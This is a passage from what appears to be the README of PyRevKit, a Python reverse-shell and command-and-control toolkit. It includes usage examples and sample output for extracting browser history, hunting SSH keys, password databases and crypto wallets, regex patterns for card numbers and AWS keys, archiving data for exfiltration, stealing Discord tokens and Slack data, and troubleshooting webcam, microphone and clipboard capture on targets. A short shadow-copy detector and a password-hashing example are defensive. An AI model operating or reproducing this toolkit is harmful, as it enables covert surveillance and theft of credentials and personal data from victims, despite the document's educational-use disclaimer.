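    "2026-04-12T23:28:40\tPROD-WEB-01\t8222\tpython.exe\tCORP\\jdoe",
    "2026-04-12T23:31:02\tPROD-WEB-01\t8222\tpython.exe\tCORP\\jdoe",
    "2026-04-13T18:15:30\tPROD-WEB-01\t8222\tpython.exe\tCORP\\jdoe",
    "2026-04-13T18:25:00\tPROD-WEB-01\t8224\tvssvc.exe\tNT AUTHORITY\\SYSTEM",
]


def run_sample() -> List[Dict[str, str]]:
    """Run the detector over the constructed export."""
    return detect(SAMPLE_LOG)


if __name__ == "__main__":
    for a in run_sample():
        print(f"[{a['time']}] {a['host']} {a['process']} ({a['user']}): {a['reason']}")
```

On the sample, the nightly backup produces nothing, the two Python-driven creations three minutes apart produce a script-host alert and then a burst alert, and the isolated creation the next evening produces a plain script-host alert. Tuning the allowlist to the host's real backup agent is what keeps this rule quiet in production.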
```
# Show first 50 bookmarks
>>> browser bookmarks
[*] Extracting browser bookmarks...
[✓] Browser BOOKMARKS - First 50 Entries
═══ CHROME (24 entries) ═══
[1] Name: Internal API Docs
    URL: https://corp.github.io/internal-api/docs
[2] Name: Jenkins CI
    URL: https://jenkins.corp.local:8080
[...]
═══ EDGE (17 entries) ═══
[1] Name: Microsoft 365 Admin
    URL: https://admin.microsoft.com
[2] Name: Azure AD - Users
    URL: https://portal.azure.com/#blade/Microsoft_AAD_IAM/UsersManagementMenuBlade
[...]
═══ FIREFOX (9 entries) ═══
[1] Name: Python asyncio docs
    URL: https://docs.python.org/3/library/asyncio.html
[2] Name: Docker Hub
    URL: https://hub.docker.com
[...]
────────────────────────────────────────────────────
Total shown: 50 entries across 3 browsers
💡 Export all bookmarks with: browser bookmarks --save
```
```
# Save all bookmarks to file → downloads/browser_bookmarks_TIMESTAMP.txt
>>> browser bookmarks --save
[*] Extracting browser bookmarks and saving to file...
[✓] Browser BOOKMARKS - Complete Data Saved to File
╔═════════════════════════════════════════════════════════╗
║                 FILE SAVED SUCCESSFULLY                 ║
╚═════════════════════════════════════════════════════════╝
Filename: browser_bookmarks_20260413_000421.txt
Location: downloads\browser_bookmarks_20260413_000421.txt
Size: 392.14 KB
Total Entries: 2440
💡 Download this file with:
>>> download downloads\browser_bookmarks_20260413_000421.txt
```
- No limit: saves everything
```
# Show first 50 downloads history entries
>>> browser downloads
[*] Extracting browser downloads...
[✓] Browser DOWNLOADS - First 50 Entries
═══ CHROME (22 entries) ═══
[1] File: C:\Users\jdoe\Downloads\ssh_keys_backup.zip
    URL: https://corp.github.io/infra/releases/download/v1.2/ssh_keys_backup.zip
    Size: 14336 bytes | Date: 2026-04-13 08:21:05
[2] File: C:\Users\jdoe\Downloads\PuTTY_sessions_export.reg
    URL: https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.82-installer.msi
    Size: 3540 bytes | Date: 2026-04-12 17:44:31
[...]
═══ EDGE (20 entries) ═══
[1] File: C:\Users\jdoe\Downloads\AzureAD_users_export.csv
    URL: https://portal.azure.com/api/export/users/csv
    Size: 52224 bytes | Date: 2026-04-13 09:01:44
[2] File: C:\Users\jdoe\Downloads\BitLocker_recovery_keys.docx
    URL: https://corp.sharepoint.com/sites/IT/Documents/BitLocker_recovery_keys.docx
    Size: 28672 bytes | Date: 2026-04-12 16:55:11
[...]
═══ FIREFOX (8 entries) ═══
[1] File: C:\Users\jdoe\Downloads\docker-compose.yml
    URL: https://raw.githubusercontent.com/corp/devops/main/docker-compose.yml
    Size: 3712 bytes | Date: 2026-04-12 20:03:55
[2] File: C:\Users\jdoe\Downloads\id_rsa
    URL: http://10.0.0.5:8080/api/keys/download/id_rsa
    Size: 1679 bytes | Date: 2026-04-12 19:49:21
[...]
────────────────────────────────────────────────────
Total shown: 50 entries across 3 browsers
💡 Export all download history with: browser downloads --save
...
```
```
# Save all download history entries to file → downloads/browser_downloads_TIMESTAMP.txt
>>> browser downloads --save
[*] Extracting browser downloads and saving to file...
[✓] Browser DOWNLOADS - Complete Data Saved to File
╔═════════════════════════════════════════════════════════╗
║                 FILE SAVED SUCCESSFULLY                 ║
╚═════════════════════════════════════════════════════════╝
Filename: browser_downloads_20260413_000545.txt
Location: downloads\browser_downloads_20260413_000545.txt
Size: 27.94 KB
Total Entries: 128
💡 Download this file with:
>>> download downloads\browser_downloads_20260413_000545.txt
```
- No limit: saves everything
```python
# Auto-find sensitive files
# '*.kdbx',        # KeePass databases
# '*.ppk',         # PuTTY private keys
# '*.pem',         # SSL certificates / SSH keys
# '*.key',         # Generic key files
# '*.p12',         # PKCS12 certificates
# '*.pfx',         # Windows certificates
# '*wallet.dat',   # Cryptocurrency wallets
# '*.ovpn',        # OpenVPN configs
# '*password*',    # Files with 'password' in name
# '*secret*',      # Files with 'secret' in name
# '*credential*',  # Files with 'credential' in name
# '*.rdp',         # Remote Desktop configs
# 'id_rsa',        # SSH private key
# 'id_dsa',        # SSH private key
# 'id_ecdsa',      # SSH private key
# 'id_ed25519',    # SSH private key
```
```
>>> exfil auto
[*] Smart exfiltration mode: auto
[✓] Smart Exfiltration - AUTO
Sensitive Files Found: 50
1. 1CA9E47175BB14B3CE13C27C0C1A5F8C3BB7D83A.key
   Path: C:\Users\jdoe\.gnupg\private-keys-v1.d\1CA9E47175BB14B3CE13C27C0C1A5F8C3BB7D83A.key
   Size: 3.93 KB
   Matched: *.key
[...]
Use download command to retrieve specific files
```
```python
# Search for SSN, credit cards, keys
# ssn:         r'\b\d{3}-\d{2}-\d{4}\b'
# credit_card: r'\b\d{4}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b'
# api_key:     r'["\']?[a-zA-Z0-9_-]{32,}["\']?'
# aws_key:     r'AKIA[0-9A-Z]{16}'
# private_key: r'-----BEGIN (?:RSA |EC )?PRIVATE KEY-----'
# email:       r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
# ipv4:        r'\b(?:\d{1,3}\.){3}\d{1,3}\b'
```
```
>>> exfil patterns
[*] Smart exfiltration mode: patterns
[✓] Smart Exfiltration - PATTERNS
Pattern Matches Found: 2 types
═══ IPV4 ═══
File: C:\Users\jdoe\\Documents\ip_address.txt
  Count: 1
  Samples: 172.45.2.123
═══ CREDIT_CARD ═══
File: C:\Users\jdoe\\Documents\payment.txt
  Count: 1
  Samples: 4131 1111 1411 1121
```
```
# Compress a directory for easier exfiltration
>>> exfil compress C:\Users\jdoe\downloads
[*] Compressing directory: C:\Users\jdoe\downloads
[✓] Smart Exfiltration - COMPRESS
Archive Created: exfil_downloads_20260413_180940.zip
Location: C:\Users\jdoe\AppData\Local\Temp\exfil_downloads_20260413_180940.zip
Size: 9.88 MB
Files Compressed: 11
Use download command to retrieve: download C:\Users\jdoe\AppData\Local\Temp\exfil_downloads_20260413_180940.zip
```
# List email clients found
>>> msg email
[*] Extracting email data...
[✓] Message Extraction - EMAIL_LIST
═══ OUTLOOK ═══
Status: Found
Path: C:\Users\jdoe\AppData\Roaming\Microsoft\Outlook
Data Files: None found
Note: No PST/OST files in Outlook directory
═══ WINDOWS_MAIL ═══
Status: Found
Location: C:\Users\jdoe\AppData\Local\Comms\UnistoreDB
Be aware that many mail and messaging clients now keep messages on the server and cache little or nothing locally, so there may be no mailbox to extract even when the client is installed.
# Export Windows Mail database via VSS
>>> msg windows_mail_export
[*] Extracting windows_mail_export data...
[✓] Message Extraction - WINDOWS_MAIL_EXPORT
╔════════════════════════════════════════════════════╗
║ WINDOWS MAIL DATABASE EXPORTED                     ║
╚════════════════════════════════════════════════════╝
Method: Volume Shadow Copy (VSS) - creating a shadow copy requires local administrator rights
Filename: windows_mail_export_20260413_181541.zip
Location: downloads\windows_mail_export_20260413_181541.zip
Files Archived: 8
Original Size: 27.21 MB
ZIP Size: 0.37 MB
Compression: 98.7%
💡 Download with:
>>> download windows_mail_export_20260413_181541.zip
# List Thunderbird mail folders
>>> msg thunderbird
[*] Extracting thunderbird data...
[✓] Message Extraction - EMAIL_THUNDERBIRD
═══ THUNDERBIRD MAIL FOLDERS ═══
Folders Found: 4
1. Inbox
Path: /home/jdoe/.thunderbird/r4k2m9lp.default/Mail/Local Folders/Inbox
Size: 2145.67 KB
2. Sent
Path: /home/jdoe/.thunderbird/r4k2m9lp.default/Mail/Local Folders/Sent
Size: 876.34 KB
3. Archives
Path: /home/jdoe/.thunderbird/r4k2m9lp.default/Mail/Local Folders/Archives
Size: 8934.11 KB
4. Drafts
Path: /home/jdoe/.thunderbird/r4k2m9lp.default/Mail/Local Folders/Drafts
Size: 43.20 KB
Note: Mail folders found - use download to retrieve mbox files
💡 Download a folder with:
>>> download /home/jdoe/.thunderbird/r4k2m9lp.default/Mail/Local Folders/Inbox
# Extract Discord tokens from Local Storage
>>> msg discord
[*] Extracting discord data...
[✓] Message Extraction - DISCORD
═══ DISCORD LOCAL STORAGE ═══
Tokens Found: 2
Token 1: NzE4NDk2MzI4NDk2MzI4NA.Xx1aZQ.k7dG2f9mNpQrVsLwYhTjBc3eKu8
Token 2: ODIxNzM0NTY3ODkwMTIzNg.Yy2bAR.m9eH3g0nOpRwWtMxZiUkCd4fLv9
Note: Discord tokens found in Local Storage
⚠️ Tokens grant full account access - treat as credentials
💡 Validate token with Discord API:
curl -H "Authorization: <token>" https://discord.com/api/v9/users/@me
# Locate Slack token and workspace data
>>> msg slack
[*] Extracting slack data...
[✓] Message Extraction - SLACK
═══ SLACK DATA LOCATIONS ═══
Locations Found: 2
1. Path: /home/jdoe/.config/Slack/storage
Note: Slack data found - contains tokens and workspace info
2. Path: /home/jdoe/.config/Slack/Cookies
Note: Slack data found - contains tokens and workspace info
💡 Download Slack storage with:
>>> download /home/jdoe/.config/Slack/storage
# Switch to PowerShell (Windows)
>>> shell powershell
[*] Checking shell upgrade: powershell
[✓] Shell Upgrade Check - POWERSHELL
PowerShell available - use 'powershell -Command <cmd>' for PowerShell commands
>>> powershell -Command ls
Directory: C:\Users\jdoe\revshell
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         2026-04-13   6:16 PM                downloads
-a----         2026-04-06   2:57 PM         204286 pyrev_target.py
# Switch to Bash (Linux/macOS)
>>> shell bash
[*] Checking shell upgrade: bash
[✓] Shell Upgrade Check - BASH
Bash available - shell commands will use bash
>>> bash -c "id && hostname"
uid=1000(jdoe) gid=1000(jdoe) groups=1000(jdoe),4(adm),27(sudo)
prod-linux-01
# Switch to Zsh
>>> shell zsh
[*] Checking shell upgrade: zsh
[✓] Shell Upgrade Check - ZSH
Zsh available - use 'zsh -c <cmd>' for zsh commands
>>> zsh -c "echo $ZSH_VERSION && whoami"
5.9
jdoe
# Check Python availability
>>> shell python
[*] Checking shell upgrade: python
[✓] Shell Upgrade Check - PYTHON
Python 3.10.11 (tags/v3.10.11:7d4cc5a, Apr 5 2023, 00:38:17) [MSC v.1929 64 bit (AMD64)] available at C:\Users\jdoe\AppData\Local\Programs\Python\Python310\python.exe - use 'python -c <code>' for Python commands
# -c takes inline code, not a script path
>>> python -c "import platform; print(platform.platform())"
# PTY upgrade info (Linux/macOS)
>>> shell pty
[*] Checking shell upgrade: pty
[✓] Shell Upgrade Check - PTY
PTY module available - full TTY shell upgrade possible (not implemented in this version)
ℹ️ PTY upgrade not yet active in this version of PyRevKit
💡 To get a full interactive TTY shell manually, run on the target:
python3 -c "import pty; pty.spawn('/bin/bash')"
Edit pyrev_server.py constants:
LOOT_DIR = "loot"                # Directory for downloaded files
PAYLOADS_DIR = "payloads"        # Directory for payloads to upload
CREDS_FILE = "credentials.json"
Edit pyrev_target.py header:
TARGET_ID = "machineA"           # Unique identifier
SERVER_HOST = "192.168.2.110"    # C2 server address
SERVER_PORT = 8765               # C2 server port
AUTO_LOGIN = ""                  # Set for autonomous mode
AUTO_PASSWORD = ""               # Set for autonomous mode (stored in cleartext in the target script)
DOWNLOAD_DIR = "downloads"       # Received files directory
Edit pyrev_client.py constants:
OP_ID = "operator1"              # Operator identifier
- For Educational/Authorized Use Only: Only use on systems you own or have explicit permission to test
- Credential Storage: Passwords are hashed but stored on disk; restrict read access to credentials.json to the operator account
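"Hashed but stored on disk" is only as good as the hashing parameters and the file permissions. The snippet below is an added example written for this page, not PyRevKit's own credential code: the JSON layout, the function names and the `target:machineA` key are assumptions. It shows the pieces a credential file like `credentials.json` needs: a random per-entry salt, a PBKDF2-HMAC-SHA256 iteration count at the OWASP-recommended level, a constant-time comparison, and a file created with mode 0600 so other local users cannot read the hashes.

```python
"""Salted PBKDF2-SHA256 credential file (added example; not PyRevKit's format).

Each record carries its own salt and iteration count so parameters can be
raised later without invalidating old entries. The store is created with
os.open(..., 0o600) rather than open(), because open() inherits the umask
and would typically leave the file world-readable.
"""
import hashlib
import hmac
import json
import os
import secrets
import tempfile

ITERATIONS = 600_000  # OWASP Password Storage Cheat Sheet (2023) for PBKDF2-HMAC-SHA256


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return a JSON-serialisable record: hex salt, iteration count, hex digest."""
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "hash": digest.hex()}


def verify_password(password, record):
    """Recompute with the record's own salt/iterations; compare in constant time."""
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(record["salt"]), record["iterations"]
    )
    return hmac.compare_digest(digest, bytes.fromhex(record["hash"]))


def save_credentials(path, creds):
    """Write creds as JSON to a file only the owner can read (0600 on POSIX)."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as fh:
        json.dump(creds, fh, indent=2)


def load_credentials(path):
    with open(path) as fh:
        return json.load(fh)


def demo_roundtrip(password="NewPassword123", iterations=ITERATIONS):
    """Create a store in a fresh temp dir, reload it and report what a check sees."""
    path = os.path.join(tempfile.mkdtemp(prefix="creds_demo_"), "credentials.json")
    save_credentials(path, {"target:machineA": hash_password(password, iterations=iterations)})
    record = load_credentials(path)["target:machineA"]
    mode = os.stat(path).st_mode & 0o777
    return {
        "good": verify_password(password, record),
        "bad": verify_password("wrong", record),
        # Windows does not honour POSIX mode bits, so only assert on POSIX.
        "mode_ok": os.name != "posix" or mode == 0o600,
    }


if __name__ == "__main__":
    print(demo_roundtrip())
```

With `ls -l credentials.json` the file should show `-rw-------`; if it shows `-rw-r--r--`, the hashes are readable by every local account and are one offline cracking run away from being passwords again.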
Problem: [ERROR] Connection rejected
Solution:
# Verify server is running
netstat -tulpn | grep 8765
# Check firewall
sudo ufw allow 8765/tcp
# Verify certificate exists
ls -l server.pem
Problem: Authentication failed
Solution:
# Verify credentials exist
cat credentials.json
# Re-add credentials
python pyrev_server.py -creds target machineA NewPassword123
# Check for typos in login/password
Problem: [✗] File not found
Solution:
# For download: verify file exists on target
>>> ls /path/to/file
# For upload: verify file in payloads/
ls -l payloads/
Problem: [✗] File too large
Solution: Files over ~50MB are rejected. Compress or split the file:
# On target
tar -czf archive.tar.gz large_directory/
>>> download archive.tar.gz
Problem: [✗] OpenCV not installed
Solution:
# On target machine
pip install opencv-python
Problem: [✗] Cannot access webcam
Solutions:
- Close other applications using the webcam
- Verify webcam is connected (Linux):
ls /dev/video*
- Check user permissions (Linux):
sudo usermod -a -G video $USER
Problem: [✗] Audio libraries not installed
Solution:
# On target machine
pip install sounddevice scipy numpy
# Linux may also need
sudo apt-get install portaudio19-dev python3-dev
Problem: Audio recording fails or is silent
Solutions:
- Check microphone is not muted
- Verify default audio device:
python -c "import sounddevice as sd; print(sd.query_devices())"
Problem: No results found when files clearly exist
Solutions:
- Check file permissions (target may not have access)
- Increase limit:
search *.pdf --limit 500
- Verify pattern syntax (matching is case-insensitive)
- Try broader pattern:
search *password*
Problem: Content search returns too many results
Solutions:
- Use more specific search term
- Adjust limit:
search --content "exact_phrase" --limit 50
Problem: Search is slow
Solution: This is normal for large filesystems. Consider:
- Reducing limit:
--limit 100
- Searching specific file types only
- Being more specific with patterns
Problem: [✗] Clipboard library not installed
Solution:
# On target machine
pip install pyperclip
Problem: [✗] Clipboard read timeout
Solutions:
- Linux: Install clipboard tools
sudo apt-get install xclip         # For X11
sudo apt-get install wl-clipboard  # For Wayland
- Verify graphical environment:
echo $DISPLAY (should show :0 or similar)
- Not supported on headless servers
Problem: Clipboard command hangs
Solution:
- Update to latest version (timeout protection added)
- Run diagnostic on target:
python test_clipboard.py
- Ensure target is not headless
Problem: Clipboard works but returns empty
Solutions:
- Clipboard is actually empty
- Clipboard contains non-text data (images, files)
- Copy some text manually and try again
Problem: Some information missing in sysinfo output
Solution: This is normal. Information availability depends on:
- Operating system
- User permissions
- Python version
No fix needed - system provides what it can access.
Windows:
- All features work out of the box after installing dependencies
- Clipboard works without additional tools
- Webcam LED may turn on during capture
Linux:
- Webcam requires user in video group
- Audio requires user in audio group
- Clipboard requires xclip (X11) or wl-clipboard (Wayland)
- Headless servers: media and clipboard features unavailable
macOS:
- All features work natively
- First use requires permission prompts (webcam, microphone, clipboard)
- Clipboard uses native pbcopy/pbpaste
This proof of concept (PoC) is provided for educational purposes only. Unauthorized access to computer systems is illegal. The authors assume no liability and are not responsible for any misuse or damage caused by this program. Use responsibly and only on systems you own or have explicit permission to test.
This project is licensed under the MIT License - see the LICENSE file for details.
⭐ If you find this project useful, please consider giving it a star!
